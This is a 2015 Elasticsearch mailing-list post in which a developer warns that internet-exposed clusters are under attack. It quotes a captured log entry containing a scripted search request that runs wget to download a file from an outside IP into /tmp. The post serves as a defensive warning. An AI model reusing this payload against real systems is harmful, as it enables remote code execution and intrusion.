Warning: Exploiting attempts for ES

In case your elasticsearch cluster is internet-accessible: Be aware folks
on the internet are probably trying to exploit it...

Found this in our logging today (This is only our staging environment
fortunately):

Caused by: org.elasticsearch.search.SearchParseException:
[logstash-2015.04.15][0]: query[ConstantScore(:)],from[-1],size[-1]:
Parse Failure [Failed to parse source [{"query": {"filtered": {"query":
{"match_all": {}}}}, "script_fields": {"exp": {"script": "import
java.util.;import java.io.;String str = "";BufferedReader br = new
BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O
/tmp/ruvn http://122.224.48.28:8000/ruvn").getInputStream()));StringBuilder
sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append("\r\n");}sb.toString();"}},
"size": 1}]]

--
Met vriendelijke groet,
Kind regards,

Eike Dehling
Lead Developer

Buzzcapture
Herengracht 180, 1016 BR, Amsterdam

T: +31 (0)20 3200377
M: +31 (0)6 45144840

LinkedIn | @buzzcapture

Recent

11-03-2015: Donderdag 26 maart organiseert Buzzcapture #Buzz15
https://www.buzzcapture.com/2015/03/buzz15-met-linkedin-uwv-en-anp/ in de
Hermitage te Amsterdam
02-03-2015: Buzzcapture breidt webcaredienstverlening uit
http://www.buzzcapture.com/2015/03/buzzcapture-breidt-webcaredienstverlening-uit-met-whatsapp/
met
WhatsApp
01-03-2014: Veel bestaande klanten integreren print
https://www.buzzcapture.com/blog/buzzcapture-biedt-en-online-geintegreerde-monitoring-aan/
content
in Social Media Dashboard
26-02-2015: Buzzcapture te horen op Radio 1
https://www.buzzcapture.com/2015/02/banendag-op-twitter-hoe-vind-je-een-baan-via-jouwbaan/over
Banendag op Twitter

--
You received this message because you are subscribed to the Google Groups "elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email to elasticsearch+unsubscribe@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/elasticsearch/CAMp7VWR4DTUri2gdkN3sMScpeXEo6isEi_%2BSHbu5vtYJmxh7pw%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.